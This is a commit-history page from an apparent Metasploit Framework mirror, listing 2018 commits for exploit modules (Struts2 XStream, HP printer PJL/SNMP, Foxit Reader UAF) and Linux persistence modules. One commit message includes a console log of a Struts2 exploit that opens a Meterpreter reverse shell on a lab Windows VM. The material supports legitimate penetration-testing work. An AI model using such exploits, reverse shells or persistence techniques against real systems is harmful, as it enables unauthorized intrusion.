adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
48,129 Commits 27 Branches 1,043 Tags
562fc09d5d9974dbffa5b60663c3c842e600af18
Commit Graph

11656 Commits

Author SHA1 Message Date
William Vu 7d21c2094e Improve PSH target and refactor check code 2018-08-27 20:18:35 -05:00
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream 
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
 2018-08-27 20:01:00 -05:00
Brent Cook 47ca6c6a14 Land #10527, Fix msftdiy EDB link check, enable HTTPS 2018-08-27 10:49:20 -05:00
Jacob Robles 79b3e4564a Land #10487, add php5 session file target 2018-08-27 06:22:28 -05:00
Brendan Coles 9725e90ba7 Fix msftdiy EDB link check 2018-08-26 04:18:38 +00:00
William Vu 6df235062b Land #10505, post-auth and default creds info 2018-08-24 18:08:15 -05:00
Jacob Robles f6674a96d9 Update poc link 2018-08-24 10:52:01 -05:00
Jacob Robles 7f3824b067 Additional path for Linux target 2018-08-24 07:18:24 -05:00
William Vu 672dbb7acb Land #9364, HP PJL/SNMP CVE-2017-2741 exploit 
Finally!
 2018-08-23 22:47:09 -05:00
Wei Chen 2193dd662d Land #10504, add Foxit Reader UAF Module and Docs 2018-08-23 18:56:07 -05:00
Matthew Kienow ecc6c473d8 Add note about unauthenticated telnetd service 2018-08-23 15:50:41 -04:00
Jacob Robles 7ceae8df58 Remove '.exe' from share name 2018-08-23 14:38:46 -05:00
Matthew Kienow 56433c8ed2 Functional decomposition refactor and cleanup 2018-08-23 15:23:42 -04:00
Matthew Kienow 961769c346 Fix SNMP Null class comparison 2018-08-23 15:23:42 -04:00
Matthew Kienow 9c05f14a70 Modify SNMP null and error handling 2018-08-23 15:23:42 -04:00
Matthew Kienow 934bb38a44 Omit parentheses for no argument method calls 2018-08-23 15:23:41 -04:00
Matthew Kienow c5958c6e38 Restore original rport value 2018-08-23 15:23:41 -04:00
Matthew Kienow 70a0b9b1be Remove payload RequiredCmd and reformat info 2018-08-23 15:23:41 -04:00
Matthew Kienow dafa62dec4 Use string interpolation over concatenation 2018-08-23 15:23:40 -04:00
Matthew Kienow 7c03454a0b Remove unnecessary explicit msf/core require 2018-08-23 15:23:40 -04:00
Matthew Kienow b1a308f3ae Remove final debug output 2018-08-23 15:23:40 -04:00
Matthew Kienow e21ea4180f Clean up module and payload 
Update module info, remove intermediate ARCH_ARMLE target, simply
options and add cleanup command so that the payload kills telnetd
 2018-08-23 15:23:40 -04:00
Matthew Kienow 81f1555439 Rename module, exploits multiple printer models 2018-08-23 15:23:40 -04:00
Matthew Kienow df18e354e1 Add bind_busybox_telnetd payload, misc cleanup 2018-08-23 15:23:39 -04:00
Matthew Kienow c0c3e12c74 WIP - hp officejet pro exploit, enhance PJL lib 2018-08-23 14:53:54 -04:00
Wei Chen b899839c53 Oops I made boo-boos 2018-08-21 08:53:43 -05:00
Jacob Robles fd6880d0d0 Add Foxit Reader UAF Module and Docs 2018-08-21 08:21:51 -05:00
Wei Chen ad0291e552 Update false negatives 2018-08-20 18:08:19 -05:00
Brent Cook 11fee8fa2c Land #10471, Import target DefaultOptions into the datastore 2018-08-20 17:30:27 -05:00
Wei Chen 01ad152067 Update false negatives on post auth information 2018-08-20 16:05:58 -05:00
Wei Chen 3d0d8f7773 Update false negatives on post auth information 2018-08-20 15:43:07 -05:00
Tim W b8b48fd37a Land #10313, add linux autostart persistence module 2018-08-20 18:17:50 +08:00
Tim W 865898cba7 minor fixes 2018-08-20 17:51:41 +08:00
Chirag Jariwala b9809d9435 Added support for php5 as target 
location of the session file in php5 is /var/lib/php5/sess_file
 2018-08-20 03:47:04 +05:30
Tim W ac71bc86ee Land #10320, add module for persistence in /etc/rc.local 2018-08-19 15:30:50 +08:00
Tim W e38775b504 minor tweaks 2018-08-19 15:27:04 +08:00
Eliott Teissonniere 63a58d3378 Code style random name 2018-08-17 14:24:28 +08:00
Eliott Teissonniere eb43e4c0bd Rework status printing 2018-08-17 14:24:28 +08:00
Eliott Teissonniere fc234b09c2 Fix HEREDOC not always supported 2018-08-17 14:24:28 +08:00
Eliott Teissonniere e82bde993f Cleanup indentation 2018-08-17 14:24:28 +08:00
Eliott Teissonniere c1d929f5fb Use an HEREDOC for multiline string 2018-08-17 14:24:28 +08:00
Eliott Teissonniere e4d6eb07ca Remove useless statement 2018-08-17 14:24:28 +08:00
Eliott Teissonniere 9962cbebfd Support perl payload 2018-08-17 14:24:28 +08:00
Eliott Teissonniere 6b4870389d Add autostart module 2018-08-17 14:24:28 +08:00
William Vu 7e496ae067 Import target DefaultOptions into the datastore 2018-08-16 12:18:02 -05:00
William Vu 60c0272270 Make style consistent 2018-08-15 21:27:40 -05:00
Kevin Kirsche cd01f11fd2 Remove verifying host keys for all exploits 2018-08-15 14:54:41 -07:00
Wei Chen d9fc99ec4a Correct false negative post_auth? status 2018-08-09 23:34:03 -05:00
Wei Chen 9122c5945e Add a comment explaining the last sleep(10) 2018-08-09 14:51:56 -05:00
Jacob Robles 66e5685ed2 Moved to exploit/windows 2018-08-09 11:35:14 -05:00